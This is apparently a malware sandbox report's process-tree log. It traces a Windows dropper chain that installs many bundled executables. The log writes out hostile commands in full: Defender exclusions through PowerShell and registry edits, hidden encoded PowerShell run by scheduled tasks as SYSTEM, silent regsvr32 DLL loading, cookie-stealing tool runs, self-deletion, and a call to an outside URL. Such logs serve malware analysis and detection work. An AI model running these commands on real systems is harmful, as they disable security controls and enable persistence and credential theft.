C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1820,6769919154698250907,1366713269162391903,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --origin-trial-disabled-features=SecurePaymentConfirmation --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3812 /prefetch:118⤵PID:416
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0cgxs25q.au0\customer6.exe & exit15⤵PID:4780
-
C:\Users\Admin\AppData\Local\Temp\0cgxs25q.au0\customer6.exeC:\Users\Admin\AppData\Local\Temp\0cgxs25q.au0\customer6.exe16⤵PID:5364
-
C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX3\main.exe"17⤵PID:864
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\au3dwjlf.0xs\HookSetp.exe & exit15⤵PID:4432
-
C:\Users\Admin\AppData\Local\Temp\au3dwjlf.0xs\HookSetp.exeC:\Users\Admin\AppData\Local\Temp\au3dwjlf.0xs\HookSetp.exe16⤵PID:1448
-
C:\ProgramData\57591.exe"C:\ProgramData\57591.exe"17⤵PID:7688
-
-
C:\ProgramData\6012005.exe"C:\ProgramData\6012005.exe"17⤵
- Suspicious behavior: SetClipboardViewer
PID:7724
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wrg5pgc5.l3h\19.exe & exit15⤵PID:4412
-
C:\Users\Admin\AppData\Local\Temp\wrg5pgc5.l3h\19.exeC:\Users\Admin\AppData\Local\Temp\wrg5pgc5.l3h\19.exe16⤵
- Drops file in Program Files directory
PID:3040 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Program Files\install.vbs"17⤵PID:6836
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install18⤵
- Loads dropped DLL
PID:4664
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\frjbap0q.rap\setup_10.2_mix.exe & exit15⤵PID:7424
-
C:\Users\Admin\AppData\Local\Temp\frjbap0q.rap\setup_10.2_mix.exeC:\Users\Admin\AppData\Local\Temp\frjbap0q.rap\setup_10.2_mix.exe16⤵PID:7928
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "17⤵PID:5836
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jikbfv5e.10j\GcleanerWW.exe /mixone & exit15⤵PID:644
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\e21kljip.ovs\b9706c20.exe & exit15⤵PID:6288
-
C:\Users\Admin\AppData\Local\Temp\e21kljip.ovs\b9706c20.exeC:\Users\Admin\AppData\Local\Temp\e21kljip.ovs\b9706c20.exe16⤵PID:5116
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xxi0dfsr.wiz\setup.exe /8-2222 & exit15⤵PID:5220
-
C:\Users\Admin\AppData\Local\Temp\xxi0dfsr.wiz\setup.exeC:\Users\Admin\AppData\Local\Temp\xxi0dfsr.wiz\setup.exe /8-222216⤵PID:2200
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Broken-Lake'17⤵PID:5352
-
-
C:\Program Files (x86)\Broken-Lake\7za.exe"C:\Program Files (x86)\Broken-Lake\7za.exe" e -p154.61.71.51 winamp.7z17⤵PID:7500
-
-
C:\Program Files (x86)\Broken-Lake\setup.exe"C:\Program Files (x86)\Broken-Lake\setup.exe" /8-222217⤵PID:4304
-
C:\Program Files (x86)\Broken-Lake\setup.exe"C:\Program Files (x86)\Broken-Lake\setup.exe" /8-222218⤵PID:6488
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bjkwwvrg.vyv\setup.exe /S /kr /site_id=754 & exit15⤵PID:7512
-
C:\Users\Admin\AppData\Local\Temp\bjkwwvrg.vyv\setup.exeC:\Users\Admin\AppData\Local\Temp\bjkwwvrg.vyv\setup.exe /S /kr /site_id=75416⤵PID:5140
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"17⤵PID:6060
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&18⤵PID:5796
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:3219⤵PID:5788
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:6419⤵PID:6808
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gavgVqeCR" /SC once /ST 03:45:34 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="17⤵
- Creates scheduled task(s)
PID:6672
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gavgVqeCR"17⤵PID:6148
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gavgVqeCR"17⤵PID:5596
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bmIXAqnwlcZKDlfrrr" /SC once /ST 14:15:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\QPVXDrhIkhHCtwmZO\oHMHtlDCFUByPPw\BtMHRlU.exe\" 9n /site_id 754 /S" /V1 /F17⤵
- Creates scheduled task(s)
PID:8848
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wkx4ugix.5ij\Four.exe & exit15⤵PID:4948
-
C:\Users\Admin\AppData\Local\Temp\wkx4ugix.5ij\Four.exeC:\Users\Admin\AppData\Local\Temp\wkx4ugix.5ij\Four.exe16⤵PID:5476
-
C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe" 0 306033e7ac94ccd3.87625057 0 10417⤵PID:6072
-
C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe" 1 3.1616940636.60608e5c636d7 10418⤵PID:340
-
C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe"C:\Users\Admin\AppData\Local\Temp\X9CC6OTVRV\multitimer.exe" 2 3.1616940636.60608e5c636d719⤵PID:7196
-
C:\Users\Admin\AppData\Local\Temp\qnzre4cjoro\vict.exe"C:\Users\Admin\AppData\Local\Temp\qnzre4cjoro\vict.exe" /VERYSILENT /id=53520⤵PID:4504
-
C:\Users\Admin\AppData\Local\Temp\is-IKJ6B.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-IKJ6B.tmp\vict.tmp" /SL5="$80298,870426,780800,C:\Users\Admin\AppData\Local\Temp\qnzre4cjoro\vict.exe" /VERYSILENT /id=53521⤵PID:4732
-
C:\Users\Admin\AppData\Local\Temp\is-VNFON.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-VNFON.tmp\winhost.exe" 53522⤵PID:8508
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\ejophvsk5l2\ikddp5f5nna.exe"C:\Users\Admin\AppData\Local\Temp\ejophvsk5l2\ikddp5f5nna.exe" /ustwo INSTALL20⤵PID:6072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 64821⤵
- Program crash
PID:8244
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 66021⤵
- Program crash
PID:8368
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 66421⤵
- Program crash
PID:8520
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 67221⤵
- Program crash
PID:8656
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 88021⤵
- Program crash
PID:9128
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 92821⤵
- Program crash
PID:8564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 114821⤵
- Program crash
PID:5572
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6072 -s 110021⤵
- Program crash
PID:344
-
-
-
C:\Users\Admin\AppData\Local\Temp\v23hm4amkxh\hwqgxrmg5kp.exe"C:\Users\Admin\AppData\Local\Temp\v23hm4amkxh\hwqgxrmg5kp.exe" /1-61020⤵PID:6288
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Ancient-Snow'21⤵PID:4240
-
-
C:\Program Files (x86)\Ancient-Snow\7za.exe"C:\Program Files (x86)\Ancient-Snow\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:8500
-
-
C:\Program Files (x86)\Ancient-Snow\hwqgxrmg5kp.exe"C:\Program Files (x86)\Ancient-Snow\hwqgxrmg5kp.exe" /1-61021⤵PID:6864
-
C:\Program Files (x86)\Ancient-Snow\hwqgxrmg5kp.exe"C:\Program Files (x86)\Ancient-Snow\hwqgxrmg5kp.exe" /1-61022⤵PID:5260
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\cx4kp2vuxxa\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\cx4kp2vuxxa\Setup3310.exe" /Verysilent /subid=57720⤵PID:7304
-
C:\Users\Admin\AppData\Local\Temp\is-K3KDE.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-K3KDE.tmp\Setup3310.tmp" /SL5="$703A0,138429,56832,C:\Users\Admin\AppData\Local\Temp\cx4kp2vuxxa\Setup3310.exe" /Verysilent /subid=57721⤵PID:4328
-
C:\Users\Admin\AppData\Local\Temp\is-CTKRQ.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-CTKRQ.tmp\Setup.exe" /Verysilent22⤵PID:9016
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bqkm0hyv2ts\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\bqkm0hyv2ts\AwesomePoolU1.exe"20⤵PID:6684
-
-
C:\Users\Admin\AppData\Local\Temp\iexdpi13rvc\app.exe"C:\Users\Admin\AppData\Local\Temp\iexdpi13rvc\app.exe" /8-2320⤵
- Suspicious use of SetWindowsHookEx
PID:5568 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Muddy-Fog'21⤵PID:7296
-
-
C:\Program Files (x86)\Muddy-Fog\7za.exe"C:\Program Files (x86)\Muddy-Fog\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:2660
-
-
C:\Program Files (x86)\Muddy-Fog\app.exe"C:\Program Files (x86)\Muddy-Fog\app.exe" /8-2321⤵PID:8240
-
C:\Program Files (x86)\Muddy-Fog\app.exe"C:\Program Files (x86)\Muddy-Fog\app.exe" /8-2322⤵PID:8568
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\xyzuw35pw54\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\xyzuw35pw54\setup_10.2_us3.exe" /silent20⤵PID:8384
-
-
C:\Users\Admin\AppData\Local\Temp\fmb5uli5kgo\Setup3310.exe"C:\Users\Admin\AppData\Local\Temp\fmb5uli5kgo\Setup3310.exe" /Verysilent /subid=57720⤵PID:4680
-
C:\Users\Admin\AppData\Local\Temp\is-39BBT.tmp\Setup3310.tmp"C:\Users\Admin\AppData\Local\Temp\is-39BBT.tmp\Setup3310.tmp" /SL5="$10AD6,138429,56832,C:\Users\Admin\AppData\Local\Temp\fmb5uli5kgo\Setup3310.exe" /Verysilent /subid=57721⤵PID:6472
-
C:\Users\Admin\AppData\Local\Temp\is-2633R.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-2633R.tmp\Setup.exe" /Verysilent22⤵PID:4868
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\bvwbopldwqc\qp5u0xgurwq.exe"C:\Users\Admin\AppData\Local\Temp\bvwbopldwqc\qp5u0xgurwq.exe" /ustwo INSTALL20⤵PID:8248
-
-
C:\Users\Admin\AppData\Local\Temp\jaz4hnrahka\vict.exe"C:\Users\Admin\AppData\Local\Temp\jaz4hnrahka\vict.exe" /VERYSILENT /id=53520⤵PID:1620
-
C:\Users\Admin\AppData\Local\Temp\is-4TTH3.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-4TTH3.tmp\vict.tmp" /SL5="$30AF4,870426,780800,C:\Users\Admin\AppData\Local\Temp\jaz4hnrahka\vict.exe" /VERYSILENT /id=53521⤵PID:10288
-
C:\Users\Admin\AppData\Local\Temp\is-SNTOC.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-SNTOC.tmp\winhost.exe" 53522⤵PID:9512
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\sl1vtx2lgzu\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\sl1vtx2lgzu\AwesomePoolU1.exe"20⤵PID:9652
-
-
C:\Users\Admin\AppData\Local\Temp\ygwqfwzo0au\bu511owear5.exe"C:\Users\Admin\AppData\Local\Temp\ygwqfwzo0au\bu511owear5.exe" /1-61020⤵PID:10100
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Patient-Bird'21⤵PID:10808
-
-
C:\Program Files (x86)\Patient-Bird\7za.exe"C:\Program Files (x86)\Patient-Bird\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:6932
-
-
C:\Program Files (x86)\Patient-Bird\bu511owear5.exe"C:\Program Files (x86)\Patient-Bird\bu511owear5.exe" /1-61021⤵PID:10732
-
C:\Program Files (x86)\Patient-Bird\bu511owear5.exe"C:\Program Files (x86)\Patient-Bird\bu511owear5.exe" /1-61022⤵PID:10312
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uxvhbojeypp\app.exe"C:\Users\Admin\AppData\Local\Temp\uxvhbojeypp\app.exe" /8-2320⤵PID:9540
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Sparkling-Shape'21⤵PID:9412
-
-
C:\Program Files (x86)\Sparkling-Shape\7za.exe"C:\Program Files (x86)\Sparkling-Shape\7za.exe" e -p154.61.71.51 winamp.7z21⤵PID:7012
-
-
C:\Program Files (x86)\Sparkling-Shape\app.exe"C:\Program Files (x86)\Sparkling-Shape\app.exe" /8-2321⤵PID:1284
-
C:\Program Files (x86)\Sparkling-Shape\app.exe"C:\Program Files (x86)\Sparkling-Shape\app.exe" /8-2322⤵PID:6212
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\hyte0pzhomz\setup_10.2_us3.exe"C:\Users\Admin\AppData\Local\Temp\hyte0pzhomz\setup_10.2_us3.exe" /silent20⤵PID:8320
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\Microsoft\App\app.bat" "21⤵PID:7400
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\HXLEN8WFIC\setups.exe"C:\Users\Admin\AppData\Local\Temp\HXLEN8WFIC\setups.exe" ll17⤵PID:7104
-
C:\Users\Admin\AppData\Local\Temp\is-I3PPJ.tmp\setups.tmp"C:\Users\Admin\AppData\Local\Temp\is-I3PPJ.tmp\setups.tmp" /SL5="$4058E,408070,216064,C:\Users\Admin\AppData\Local\Temp\HXLEN8WFIC\setups.exe" ll18⤵PID:3960
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\0e-48b5d-df6-bc48b-4669b156e81f4\Jolaheraby.exe"C:\Users\Admin\AppData\Local\Temp\0e-48b5d-df6-bc48b-4669b156e81f4\Jolaheraby.exe"14⤵
- Checks computer location settings
PID:5152
-
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"C:\Program Files (x86)\VR\Versium Research\jg7_7wjg.exe"11⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:5304
-
-
C:\Program Files (x86)\VR\Versium Research\RunWW.exe"C:\Program Files (x86)\VR\Versium Research\RunWW.exe"11⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
PID:4788 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im RunWW.exe /f & timeout /t 6 & del /f /q "C:\Program Files (x86)\VR\Versium Research\RunWW.exe" & del C:\ProgramData\*.dll & exit12⤵PID:7132
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im RunWW.exe /f13⤵
- Kills process with taskkill
PID:4496
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 613⤵
- Delays execution with timeout.exe
PID:4728
-
-
-
-
C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"C:\Program Files (x86)\VR\Versium Research\hjjgaa.exe"11⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3248 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:5416
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵
- Executes dropped EXE
PID:7156
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:9576
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt12⤵PID:3464
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jocgai45rsf\vict.exe"C:\Users\Admin\AppData\Local\Temp\jocgai45rsf\vict.exe" /VERYSILENT /id=5358⤵
- Executes dropped EXE
PID:2904 -
C:\Users\Admin\AppData\Local\Temp\is-8IGAC.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-8IGAC.tmp\vict.tmp" /SL5="$301DE,870426,780800,C:\Users\Admin\AppData\Local\Temp\jocgai45rsf\vict.exe" /VERYSILENT /id=5359⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1312 -
C:\Users\Admin\AppData\Local\Temp\is-76J7P.tmp\winhost.exe"C:\Users\Admin\AppData\Local\Temp\is-76J7P.tmp\winhost.exe" 53510⤵
- Executes dropped EXE
PID:6028 -
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\qtTlQ0Vmj.dll"11⤵PID:5684
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\qtTlQ0Vmj.dll"12⤵
- Loads dropped DLL
PID:4804 -
C:\Windows\system32\regsvr32.exe/s "C:\Users\Admin\AppData\Local\Temp\qtTlQ0Vmj.dll"13⤵
- Loads dropped DLL
PID:5280
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /C regsvr32 /s "C:\Users\Admin\AppData\Local\Temp\qtTlQ0Vmj.dllZbU1btJdh.dll"11⤵PID:7060
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Users\Admin\AppData\Local\Temp\qtTlQ0Vmj.dllZbU1btJdh.dll"12⤵PID:6872
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6028 -s 128011⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:2132
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\lnbbagjydev\AwesomePoolU1.exe"C:\Users\Admin\AppData\Local\Temp\lnbbagjydev\AwesomePoolU1.exe"8⤵
- Executes dropped EXE
PID:2232
-
-
C:\Users\Admin\AppData\Local\Temp\xrpavrz05ri\ujrfw5dzs5t.exe"C:\Users\Admin\AppData\Local\Temp\xrpavrz05ri\ujrfw5dzs5t.exe" /ustwo INSTALL8⤵
- Executes dropped EXE
PID:2908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 6489⤵
- Program crash
PID:4888
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 6649⤵
- Program crash
PID:3136
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 6689⤵
- Program crash
PID:6012
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 2689⤵
- Program crash
PID:5032
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 8809⤵
- Program crash
PID:1528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 9569⤵
- Program crash
PID:6064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 11569⤵
- Program crash
PID:984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2908 -s 11689⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
PID:5496
-
-
-
C:\Users\Admin\AppData\Local\Temp\hedvv0fekkg\vpn.exe"C:\Users\Admin\AppData\Local\Temp\hedvv0fekkg\vpn.exe" /silent /subid=4828⤵
- Executes dropped EXE
PID:4560 -
C:\Users\Admin\AppData\Local\Temp\is-B5N8L.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-B5N8L.tmp\vpn.tmp" /SL5="$10482,15170975,270336,C:\Users\Admin\AppData\Local\Temp\hedvv0fekkg\vpn.exe" /silent /subid=4829⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of FindShellTrayWindow
PID:3944 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "10⤵
- Blocklisted process makes network request
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:5728 -
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090111⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:7008
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "10⤵
- Blocklisted process makes network request
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Modifies registry class
PID:4464 -
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090111⤵PID:3052
-
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" uninstall10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:7948
-
-
C:\Program Files (x86)\MaskVPN\mask_svc.exe"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install10⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1728
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\wzrk0edgzla\IBInstaller_97039.exe"C:\Users\Admin\AppData\Local\Temp\wzrk0edgzla\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq8⤵
- Executes dropped EXE
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\is-MU07H.tmp\IBInstaller_97039.tmp"C:\Users\Admin\AppData\Local\Temp\is-MU07H.tmp\IBInstaller_97039.tmp" /SL5="$2049C,12301571,721408,C:\Users\Admin\AppData\Local\Temp\wzrk0edgzla\IBInstaller_97039.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs97039 -token mtn1co3fo4gs5vwq9⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
PID:2984 -
C:\Users\Admin\AppData\Local\Temp\is-ADN9R.tmp\{app}\chrome_proxy.exe"C:\Users\Admin\AppData\Local\Temp\is-ADN9R.tmp\{app}\chrome_proxy.exe"10⤵
- Executes dropped EXE
PID:5264 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping localhost -n 4 && del "C:\Users\Admin\AppData\Local\Temp\is-ADN9R.tmp\{app}\chrome_proxy.exe"11⤵PID:2128
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 412⤵
- Runs ping.exe
PID:4652
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://hostoryarticlesclub.com/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=9703910⤵
- Checks computer location settings
PID:5256
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2ihnl2sad5l\1s3e04nqvcn.exe"C:\Users\Admin\AppData\Local\Temp\2ihnl2sad5l\1s3e04nqvcn.exe" /1-6108⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:3068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Late-Water'9⤵PID:4612
-
-
C:\Program Files (x86)\Late-Water\7za.exe"C:\Program Files (x86)\Late-Water\7za.exe" e -p154.61.71.51 winamp.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6600
-
-
C:\Program Files (x86)\Late-Water\1s3e04nqvcn.exe"C:\Program Files (x86)\Late-Water\1s3e04nqvcn.exe" /1-6109⤵
- Executes dropped EXE
PID:4548 -
C:\Program Files (x86)\Late-Water\1s3e04nqvcn.exe"C:\Program Files (x86)\Late-Water\1s3e04nqvcn.exe" /1-61010⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:2028
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\pxspzspiv4n\app.exe"C:\Users\Admin\AppData\Local\Temp\pxspzspiv4n\app.exe" /8-238⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:5188 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Wandering-Wildflower'9⤵PID:5232
-
-
C:\Program Files (x86)\Wandering-Wildflower\7za.exe"C:\Program Files (x86)\Wandering-Wildflower\7za.exe" e -p154.61.71.51 winamp.7z9⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:6428
-
-
C:\Program Files (x86)\Wandering-Wildflower\app.exe"C:\Program Files (x86)\Wandering-Wildflower\app.exe" /8-239⤵
- Executes dropped EXE
PID:6928 -
C:\Program Files (x86)\Wandering-Wildflower\app.exe"C:\Program Files (x86)\Wandering-Wildflower\app.exe" /8-2310⤵
